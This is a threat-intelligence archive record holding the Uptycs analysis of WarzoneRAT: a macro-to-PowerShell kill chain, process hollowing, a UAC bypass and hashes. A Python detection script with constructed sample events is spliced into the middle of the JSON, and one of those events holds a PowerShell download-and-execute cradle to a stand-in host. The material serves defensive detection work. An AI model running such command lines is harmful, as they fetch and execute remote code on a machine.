{
	"id": "a445a0df-92d6-4e0d-9875-3a6827aa5203",
	"created_at": "2026-04-06T00:14:14.531568Z",
	"updated_at": "2026-04-10T13:12:20.975888Z",
	"deleted_at": null,
	"sha1_hash": "3a8a5c3949a5a4822a7598d2618046df5ccf1cc1",
	"title": "WarzoneRAT Can Now Evade Detection With Process Hollowing",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2453199,
	"plain_text": "WarzoneRAT Can Now Evade Detection With Process Hollowing\r\nBy Uptycs Threat Research\r\nPublished: 2022-05-31 · Archived: 2026-04-05 17:18:46 UTC\r\nResearch by: Pritam Salunkhe and Shilpesh Trivedi\r\nThe Uptycs Threat Research Team identified samples of WarzoneRAT dropped through a PowerShell dropper that implements process injection (process hollowing) to bypass detection. We first identified WarzoneRAT using a Windows User Account Control (UAC) bypass technique in November 2020.\r\nThis blog post details the operation of the latest WarzoneRAT sample and also covers the capabilities of the Uptycs EDR in detecting techniques such as process hollowing and UAC bypass.\r\nWarzoneRAT is a remote administration tool with a wide range of capabilities, including remote desktop, webcam capture, and live and offline keylogging. The malware is distributed as malware-as-a-service (MaaS) and is also used as a staged payload in the attack kill chain by threat actors in APT attacks.\r\nThe Uptycs Threat Research Team contributed to the profile of WarzoneRAT (S0670) in the MITRE ATT\u0026CK framework, detailing the techniques and functionality of the malware.\r\nMalware Operation\r\nA depiction of the kill chain used by WarzoneRAT in one of the recently captured samples in our in-house osquery-integrated threat intelligence sandbox is shown below (Figure 1).\r\nhttps://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing\r\nPage 1 of 7\r\nFigure 1: Attack kill chain of the latest WarzoneRAT sample, including process hollowing\r\nThe kill chain includes the following steps:\r\n1. The malicious document launches EXCEL.exe, which executes wscript.exe to run Update.js, a JavaScript file embedded in the macro itself, and copies Update.js to the Startup folder.\r\n2. The JS script then copies mshta.exe from C:\\Windows\\System32 to C:\\ProgramData\\ and names it ‘ddond.com’. It launches ddond.com (the masqueraded mshta.exe) to execute hxxps://taxfile[.]mediafire[.]com/file/c3zcoq7ay6nq19i/back[.]htm/file.\r\n3. back.htm, executed via ddond.com, runs a PowerShell command that downloads another PowerShell script and executes it via Invoke-Expression. It also creates a scheduled task with schtasks.exe for persistence.\r\n4. The PowerShell script executed via Invoke-Expression runs the embedded WarzoneRAT and other .NET binary payloads using the process hollowing technique, as shown in Figure 1.\r\n5. It also launches csc.exe to compile a .cs file on the fly into a DLL that decompresses the compressed code for further execution.\r\nThe Uptycs detection graph showing the execution flow of the attack kill chain is shown below (Figure 2).\r\nFigure 2: Uptycs detection graph of the WarzoneRAT chain\r\nProcess Hollowing Technique\r\nMITRE: https://attack.mitre.org/techniques/T1055/012/\r\nThe macro embedded in the document (SHA-256: 907012a9e2eff4291cd1162a0f2ac726f93bad0ef57e326d5767489e89bc0b0a) executes multiple sets of commands to download a PowerShell script that loads the malicious executables in memory with the [Reflection.Assembly]::Load method, as shown in Figure 3.\r\nFigure 3: Deobfuscated PowerShell code using process injection into a legitimate process\r\nThe script then calls the “Execute” function of the class “projFUD.PA”.\r\nThe “Execute” function uses the process hollowing technique to inject malicious code into legitimate processes such as aspnet_compiler.exe, aspnet_regbrowsers.exe, CasPol.exe, RegAsm.exe and MSBuild.exe.\r\nThe API usage for the process hollowing is shown below (see Figure 4).\r\nFigure 4: Process hollowing code in the .NET payload\r\nUAC Bypass\r\nMITRE ATT\u0026CK: https://attack.mitre.org/techniques/T1548/002/\r\nAlongside process hollowing and code injection, the PowerShell script also injects another .NET payload (SHA-256: 8A389D732476E581EA576999E0191142BB8324F708744260303C1D9CFE1A79AE) that performs a UAC bypass via ComputerDefaults.exe.\r\nFigure 5: UAC bypass implemented in the .NET payload\r\nUptycs EDR Detection\r\nUptycs EDR, armed with YARA process scanning, advanced detections, and correlation of registry events, process file events, process events and API events, successfully detects the different tactics carried out by WarzoneRAT.\r\nAdditionally, Uptycs EDR contextual detection provides further details about the detected malware. Users can navigate to the toolkit data section of the detection alert and click on the name to see the behavior, as shown below (see Figure 6).\r\nFigure 6: Uptycs detection for WarzoneRAT\r\nConclusion\r\nThis blog detailed the new WarzoneRAT operation on a victim's machine. We shed light on the process hollowing technique it now uses to evade process-based defenses. This makes it necessary to have a security solution with advanced analytics that provides granular visibility into targeted attacks and their kill chain. Uptycs EDR, with its advanced detection, correlation, and YARA process scanning capabilities, successfully identified the malicious behavior and detected WarzoneRAT.\r\nTo learn more about the latest threat research conducted by the Uptycs Team, check out our most recent threat bulletin below.\r\nSource: https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing",
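The kill chain in the plain_text above (Office macro to wscript.exe, mshta.exe copied to C:\ProgramData\ddond.com, PowerShell starting argument-less .NET utilities as hollowing hosts, ComputerDefaults.exe for the UAC bypass) maps directly onto process-creation telemetry. The block below is an added example, not code from Uptycs, from the blog, or from the malware: four detection heuristics run over constructed Sysmon-style events. Field names (pid, ppid, image, parent_image, command_line, original_file_name) are assumed to mirror Sysmon Event ID 1, the sample events and the hxxp://example.invalid URL are constructed, and the ComputerDefaults.exe rule is an assumed heuristic, since the page names the binary but not the bypass mechanism.

```python
"""Process-creation heuristics for the WarzoneRAT chain described above. Added
example (not Uptycs' or the malware's code); Sysmon-style fields are assumed."""
import ntpath
import shlex
from collections import defaultdict

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# .NET utilities the page names as process-hollowing hosts.
HOLLOW_TARGETS = {"aspnet_compiler.exe", "aspnet_regbrowsers.exe",
                  "caspol.exe", "regasm.exe", "msbuild.exe"}
# Signed Windows binaries worth flagging when they run under another name.
WATCHED_ORIGINALS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()

def ancestors(ev, tree, max_depth=8):
    """Image names of parent, grandparent, ... (no pid-reuse handling)."""
    out, cur = [], tree.get(ev["ppid"])
    while cur is not None and len(out) < max_depth:
        out.append(base(cur["image"]))
        cur = tree.get(cur["ppid"])
    return out

def rule_office_spawns_script_host(ev, tree):
    # Macro -> wscript.exe running Update.js is the first hop of the chain.
    return base(ev["parent_image"]) in OFFICE and base(ev["image"]) in SCRIPT_HOSTS

def rule_renamed_lolbin(ev, tree):
    # mshta.exe copied to C:\ProgramData\ddond.com keeps its PE
    # OriginalFileName, so the on-disk name and the original name disagree.
    orig = ev.get("original_file_name", "").lower()
    return orig in WATCHED_ORIGINALS and base(ev["image"]) != orig

def rule_dotnet_hollowing_host(ev, tree):
    # A .NET utility started under PowerShell with no arguments has nothing
    # legitimate to do; it is the typical hollowed host in this chain.
    if base(ev["image"]) not in HOLLOW_TARGETS:
        return False
    argc = len(shlex.split(ev["command_line"], posix=False))
    return argc <= 1 and "powershell.exe" in ancestors(ev, tree)

def rule_computerdefaults_uac_bypass(ev, tree):
    # Assumed heuristic: the page names ComputerDefaults.exe as the bypass
    # vehicle but not the mechanism. The auto-elevated binary is normally
    # started from explorer.exe; any other parent deserves a look.
    return (base(ev["image"]) == "computerdefaults.exe"
            and base(ev["parent_image"]) != "explorer.exe")

RULES = {
    "office_spawns_script_host": rule_office_spawns_script_host,
    "renamed_lolbin": rule_renamed_lolbin,
    "dotnet_hollowing_host": rule_dotnet_hollowing_host,
    "computerdefaults_uac_bypass": rule_computerdefaults_uac_bypass,
}

def scan(events):
    """Return {rule name: [pids that triggered it]}."""
    tree = {e["pid"]: e for e in events}
    hits = defaultdict(list)
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev, tree):
                hits[name].append(ev["pid"])
    return dict(hits)

def _ev(pid, ppid, image, parent, cmd, orig):
    return {"pid": pid, "ppid": ppid, "image": image, "parent_image": parent,
            "command_line": cmd, "original_file_name": orig}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
XL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
# Constructed sample: the page's chain (pids 200-700) plus one benign MSBuild run.
SAMPLE_EVENTS = [
    _ev(100, 1, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe",
        "explorer.exe", "EXPLORER.EXE"),
    _ev(200, 100, XL, r"C:\Windows\explorer.exe", '"EXCEL.EXE" invoice.xlsm', "Excel.exe"),
    _ev(300, 200, r"C:\Windows\System32\wscript.exe", XL,
        r'wscript.exe "C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.js"',
        "wscript.exe"),
    _ev(400, 300, r"C:\ProgramData\ddond.com", r"C:\Windows\System32\wscript.exe",
        r"C:\ProgramData\ddond.com hxxps://taxfile[.]mediafire[.]com/file/c3zcoq7ay6nq19i/back[.]htm/file",
        "MSHTA.EXE"),
    _ev(500, 400, PS, r"C:\ProgramData\ddond.com",
        "powershell -w hidden -c \"IEX((New-Object Net.WebClient).DownloadString('hxxp://example.invalid/s.ps1'))\"",
        "PowerShell.EXE"),
    _ev(600, 500, NET + r"\RegAsm.exe", PS, '"' + NET + r'\RegAsm.exe"', "RegAsm.exe"),
    _ev(700, 600, r"C:\Windows\System32\ComputerDefaults.exe", NET + r"\RegAsm.exe",
        "ComputerDefaults.exe", "ComputerDefaults.exe"),
    _ev(800, 100, NET + r"\MSBuild.exe", r"C:\Windows\System32\cmd.exe",
        "MSBuild.exe app.csproj /t:Build", "MSBuild.exe"),
]

if __name__ == "__main__":
    for name, pids in scan(SAMPLE_EVENTS).items():
        print(f"{name}: pids {pids}")
```

The renamed-LOLBin rule is the one that survives the masquerade: ddond.com is still mshta.exe by PE OriginalFileName, which is exactly the field Sysmon records. The hollowing-host rule deliberately requires both an empty argument list and PowerShell in the ancestry, so the benign MSBuild build from cmd.exe (pid 800) does not fire; tune HOLLOW_TARGETS and the parent set to your own baseline before deploying it.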
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing"
	],
	"report_names": [
		"warzonerat-can-now-evade-with-process-hollowing"
	],
	"threat_actors": [],
	"ts_created_at": 1775434454,
	"ts_updated_at": 1775826740,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3a8a5c3949a5a4822a7598d2618046df5ccf1cc1.pdf",
		"text": "https://archive.orkl.eu/3a8a5c3949a5a4822a7598d2618046df5ccf1cc1.txt",
		"img": "https://archive.orkl.eu/3a8a5c3949a5a4822a7598d2618046df5ccf1cc1.jpg"
	}
}